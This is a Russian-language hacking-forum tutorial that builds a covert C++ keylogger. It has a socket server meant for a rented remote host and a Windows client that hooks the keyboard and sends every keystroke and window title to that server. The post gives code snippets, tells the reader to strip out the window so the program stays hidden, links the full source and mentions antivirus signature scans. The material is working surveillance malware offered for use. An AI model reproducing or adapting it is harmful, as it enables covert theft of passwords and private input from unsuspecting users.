Найти тему
LOLZTEAM

Пишем карманный кейлоггер на C++

В этой статье я хочу показать, насколько просто написать самому кейлоггер с базовым функционалом. Базу я позаимствовал отсюда - https://simple-keylogger.github.io, пофиксил баги и доработал под взаимодействие с WinSocket.

Материалы

  • Visual Studio 2015 Community Update 4
  • Visual C++ 2015

Структура приложения
Для начала необходимо определить, как вообще будет работать кейлоггер. Будь то отсылка логов на FTP/Почту, запись нажатий в сокет, отправка файла на гейт, запись логов в бд.
Я решил остановится на сокетах. Почему? Это удобно, просто и юзабельно.
Исходя из выбора, нам нужно будет сделать 2 приложения:
Сервер

  • Консольное приложение, которое будет принимать данные от клиента и выдавать в консоли

Клиент

  • Собственно, сам кейлоггер, который будет отсылать нажатия клавиш на сервер

И начнем мы, пожалуй, с сервера.

Сервер
Создаем консольное C++ приложение в Visual Studio.
Весь код есть в оф. примере MSDN -
https://msdn.microsoft.com/en-us/library/ms737593(VS.85).aspx
Нам лишь нужно заменить некоторые значения в нем...
Сразу пропишем константные переменные: величину буффера и порт сервера, на который будут приходить логи

Код:

#define DEFAULT_BUFLEN 1024 //Буффер
#define DEFAULT_PORT "1337" //Порт

Вместо единоразового do/while ставим бесконечный цикл, в котором будем принимать данные от клиента, выводить их в консоль, закрывать соединение и по новой:

Код:

do {
ClientSocket = accept(ListenSocket, NULL, NULL); //Принимаем коннект
iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);//Считываем лог
if (iResult > 0) //Если лог не пустой
printf("%s", recvbuf); //Выводим
closesocket(ClientSocket);//Закрываем соединение
memset(recvbuf, 0, sizeof recvbuf);//Освобождаем память
}
while (true);

Компилируем в Release, закидываем на дедик, открываем нужный нам порт и запускаем

Клиент
Создаем приложение Win32 в Visual Studio.
Как я уже и говорил выше, хук клавиатуры и обработчик нажатий я взял с
https://github.com/GiacomoLaw/Keylogger/blob/master/windows/klog_main.cpp
Чтоб прикрутить отправку нажатия на сокет я обратился к
https://msdn.microsoft.com/en-us/library/ms737591(VS.85).aspx
Так же, сразу определяем константные переменные: длину буффера, айпи дедика/компа и порт

Код:

#define DEFAULT_BUFLEN 20000
#define SERVER_IP "127.0.0.1"
#define SERVER_PORT "1337"

Некоторые переменные пришлось вытащить из их методов и сделать глобальными, чтобы код начал работать корректно:

Код:

WSADATA wsaData;
SOCKET ConnectSocket = INVALID_SOCKET;
HHOOK _hook;KBDLLHOOKSTRUCT kbdStruct;
char lastwindow[256];
int Save(int key_stroke);// Убрал второй аргумент

Создаем метод отправки данных на сервер по примеру, который был в начале абзаца. Далее, везде заменяем порт, айпи и передаваемую инфу на аргументы функции:

Код:

void sendData(char *ip, char * port, char*data)

В методе Save делаем следующее - убираем второй аргумент и меняем запись логов в файл на отправку к серверу:

Код:

char data[DEFAULT_BUFLEN];
sprintf(data, "\n\n[Window: %s - at %s]\n", window_title, s); sendData(SERVER_IP, SERVER_PORT, data);

Далее, по такому же принципу, меняем отправку в нажатиях служебных клавиш. Отправку букв можно сделать таким образом:

Код:

char c[512];
sprintf(c, "%c", key_stroke);
sendData(SERVER_IP, SERVER_PORT, c);

Вырезаем все что связано с видимостью окна из кода, и, готово.

Итог

При запуске кейлоггера, он повиснет в процессах и будет обрабатывать каждое нажатие на клавиатуре. Возможно, некоторые символы будут отображаться некорректно, например, слеши, но все это можно исправить самому (ведь если бы все было идеально, ко мне в личку стучал Иисус с просьбой проверить продажник приватного кейлоггера).

Ссылки

Сигнатурные сканы (не спрашивайте зачем просканил сервер, просто так):

Кейлоггер, взятый за основу - https://simple-keylogger.github.io
Сокет-сервер -
https://msdn.microsoft.com/en-us/library/ms737593(VS.85).aspx
Сокет-клиент -
https://msdn.microsoft.com/en-us/library/ms737591(VS.85).aspx
Готовые исходники проекта -
https://github.com/ims0rry/Socket-keylogger

Подпишись на наш канал а также посещай наш сайт